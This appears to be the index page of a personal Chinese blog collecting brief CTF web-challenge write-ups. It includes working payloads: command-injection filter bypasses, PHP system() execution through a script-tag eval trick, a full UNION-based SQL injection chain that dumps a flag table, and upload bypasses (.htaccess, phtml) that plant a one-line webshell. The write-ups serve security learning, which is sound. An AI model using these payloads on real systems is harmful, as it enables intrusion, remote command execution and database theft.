LOADING

加载过慢请开启缓存 浏览器默认开启

youbing的博客

记录学习与生活

技术博客,分享编程学习笔记

webshell是啥捏

2026/1/28

这里表情拼出来
webshell是啥捏_6541b55b
=passthru,可以用
webshell是啥捏_4b9da4bb
执行命令,ls一下出来一个flag.txt

cat /flag.txt就得到flag了

webshell是啥捏_5252bcd1

阅读全文

babyRCE

2026/1/28

发现题目没有禁用ls,传个?rce=ls,发现有一个flag.php,用\绕过cat和flag的检测,用 ${IFS}代替空格

?rce=c\at${IFS}fl\ag.php

发现Flag在源码中

babyRCE_0ff5a64f

阅读全文

SIGN IN!

2026/1/27

按照题目要求设置请求头

User-Agent: CTF-Robot/1.0

Cookie: session=valid_user

Referer: https://ctf.example.com

Cookie这里要带上原来的cookie

Cookie:PHPSESSID=5e5b3975b2539c04b222717b0199486c; session=valid_user

按照关卡步骤设置最后得到flag

SIGN-IN_4377cd3f

阅读全文

easyupload1.0

2026/1/27

打开题目发现要上传一个.jpg文件,把一句话木马换成.jpg格式再抓包改回来试试

easyupload1.0_d08eefb9

成功上传,用蚁剑连接,在环境变量中找到flag

easyupload1.0_f416dfe2

阅读全文

easyupload3.0

2026/1/27

这里抓包修改失败

easyupload3.0_c1901345

网页标签提醒我们试试和某些文件配合,发现服务器是服务器是Apache,尝试上传.htaccess进行绕过。先上传.htaccess

在传一句话木马(.jpg格式),上传成功用蚁剑连接找到flag

easyupload3.0_fa6ef427

阅读全文

easyupload2.0

2026/1/27

抓包修改告诉我们不能用php格式,换phtml试试,发现上传成功,用蚁剑连接

在环境变量中找到flag

easyupload2.0_d02dac62

阅读全文

我Flag呢?

2026/1/27

查看源码发现flag

我Flag呢_152601d0

阅读全文

EZ_eval

2026/1/26

EZ_eval_5334e318

这里发现script没有被禁用,%09代替空格构造payload:

?word=<script%09language=’php’>system(‘ls%09/‘)

发现flag文件

尝试?word=<script%09language=’php’>system(‘ct%09flg’)

好像不行,这里直接读取文件内容

<script%09language=’php’>system(‘strings%09/fl*’)

得到flag

EZ_eval_1939400c

阅读全文

这是什么?SQL !注一下 !

2026/1/26

题目给出提示
<?php
$sql = “SELECT username,password FROM users WHERE id = “.’((((((‘.$_GET[“id”].’))))))’;
$result = $conn->query($sql);

直接让id=1,id=2测字段到3时发现没有数据返回确认有两个字段

直接闭合括号union select 1,2#这里1,2都正常回显然后

-1))))))union select group_concat(schema_name),2 from information_schema.schemata#

 查库名发现

nformation_schema,mysql,ctftraining,performance_schema,test,ctf

先试试ctftraining

查表名union select group_concat(table_name),2 from information_schema.tables where table_schema=’ctftraining’

查到一个flag再查flag中的字段名

-1))))))union select group_concat(column_name),2 from information_schema.columns where table_schema=’ctftraining’ and table_name=’flag’#

Flag中的字段名也叫flag直接查询得到flag

-1))))))union select group_concat(flag),2 from ctftraining.flag#

这是什么SQL-注一下_d78d2fbe

阅读全文

看看ip

2026/1/26

打开题目显示了访问ip没办法在网页直接修改,尝试抓包用X-Forwarded-For可以修改ip地址尝试命令执行直接ls不行尝试使用

{system(“ls /“)}找到flag文件

{system(“cat /flag”)}得到flag

看看ip_a2907753

阅读全文
1 ... 15 16
avatar
youbing

你好!我是 youbing
这是我的技术博客
分享编程学习笔记和生活记录